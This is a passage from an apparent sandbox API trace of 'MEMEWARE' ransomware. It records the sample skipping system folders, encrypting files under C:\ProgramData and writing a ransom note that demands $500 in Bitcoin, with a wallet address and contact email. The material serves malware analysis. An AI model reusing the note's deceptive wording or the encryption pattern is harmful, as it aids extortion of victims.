lpOverlapped=0x0) returned 1 [0066.022] CloseHandle (hObject=0xd8) returned 1 [0066.022] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0066.022] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0066.022] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96 [0066.022] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0066.022] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.022] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.022] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.022] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.022] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.022] lstrcmpiW (lpString1="print_pref.ico", lpString2="Windows") returned -1 [0066.022] lstrcmpiW 
(lpString1="print_pref.ico", lpString2="Program Files") returned -1 [0066.022] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files (x86)") returned -1 [0066.023] lstrcmpiW (lpString1="print_pref.ico", lpString2="$Recycle.bin") returned 1 [0066.023] lstrcmpiW (lpString1="print_pref.ico", lpString2="System Volume Information") returned -1 [0066.023] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100 [0066.023] StrStrIW (lpFirst="print_pref.ico", lpSrch=".protected") returned 0x0 [0066.023] lstrcmpW (lpString1="print_pref.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.023] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.023] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="Windows") returned -1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files") returned -1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files (x86)") returned -1 [0066.023] lstrcmpiW (lpString1="print_property.ico", lpString2="$Recycle.bin") returned 1 [0066.023] lstrcmpiW 
(lpString1="print_property.ico", lpString2="System Volume Information") returned -1 [0066.023] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104 [0066.023] StrStrIW (lpFirst="print_property.ico", lpSrch=".protected") returned 0x0 [0066.023] lstrcmpW (lpString1="print_property.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.023] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.023] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="Windows") returned -1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files") returned -1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files (x86)") returned -1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="$Recycle.bin") returned 1 [0066.023] lstrcmpiW (lpString1="print_queue.ico", lpString2="System Volume Information") returned -1 [0066.023] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101 [0066.023] StrStrIW (lpFirst="print_queue.ico", lpSrch=".protected") returned 0x0 [0066.023] lstrcmpW (lpString1="print_queue.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.024] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.024] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="Windows") returned -1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files") returned 1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files (x86)") returned 1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="$Recycle.bin") returned 1 [0066.024] lstrcmpiW (lpString1="scan_.ico", lpString2="System Volume Information") returned -1 [0066.024] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95 [0066.024] StrStrIW (lpFirst="scan_.ico", lpSrch=".protected") returned 0x0 [0066.024] lstrcmpW (lpString1="scan_.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.024] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.024] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.025] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.025] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="Windows") returned -1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files") returned 1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files (x86)") returned 1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="$Recycle.bin") returned 1 [0066.025] lstrcmpiW (lpString1="scan_property.ico", lpString2="System Volume Information") returned -1 [0066.025] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103 [0066.025] StrStrIW (lpFirst="scan_property.ico", lpSrch=".protected") returned 0x0 [0066.025] lstrcmpW (lpString1="scan_property.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.025] 
CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.025] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Windows") returned -1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files") returned 1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files (x86)") returned 1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="$Recycle.bin") returned 1 [0066.025] lstrcmpiW (lpString1="scan_settings.ico", lpString2="System Volume Information") returned -1 [0066.025] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103 [0066.025] StrStrIW (lpFirst="scan_settings.ico", lpSrch=".protected") returned 0x0 [0066.025] lstrcmpW (lpString1="scan_settings.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.025] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device 
stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.025] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0066.025] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0066.025] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 95 [0066.025] StrStrIW (lpFirst="tasks.xml", lpSrch=".protected") returned 0x0 [0066.025] lstrcmpW (lpString1="tasks.xml", lpString2="RESTORE_FILES.txt") returned 1 [0066.026] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.026] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.026] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.026] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 0 [0066.026] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0066.026] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt") returned 103 [0066.026] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.026] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.026] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0066.027] lstrlenA (lpString="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") returned 684 [0066.027] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0066.027] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.027] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.027] CloseHandle (hObject=0xd4) returned 1 [0066.027] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.027] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.027] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt") returned 64 [0066.027] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.037] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.037] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.038] lstrlenA (lpString="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") returned 684 [0066.038] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.038] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.038] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.038] CloseHandle (hObject=0xb4) returned 1 [0066.039] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.039] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.039] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\RESTORE_FILES.txt") returned 59 [0066.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.039] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.039] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.040] lstrlenA (lpString="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") returned 684 [0066.040] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.040] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.040] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.040] CloseHandle (hObject=0xa4) returned 1 [0066.040] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="Windows") returned -1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files") returned -1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files (x86)") returned -1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="$Recycle.bin") returned 1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="System Volume Information") returned -1 [0066.040] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned 39 [0066.040] lstrcmpW (lpString1="DeviceSync", lpString2=".") returned 1 [0066.040] lstrcmpW (lpString1="DeviceSync", lpString2="..") returned 1 [0066.040] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*") returned 41 [0066.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.041] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.041] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.041] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.041] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.041] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.041] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\.") returned 41 [0066.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.041] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.041] lstrcmpiW 
(lpString1="..", lpString2="Windows") returned -1 [0066.041] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.041] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.041] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.041] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.041] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\..") returned 42 [0066.041] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.041] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.041] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.041] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.041] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\RESTORE_FILES.txt") returned 57 [0066.041] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\devicesync\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.042] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
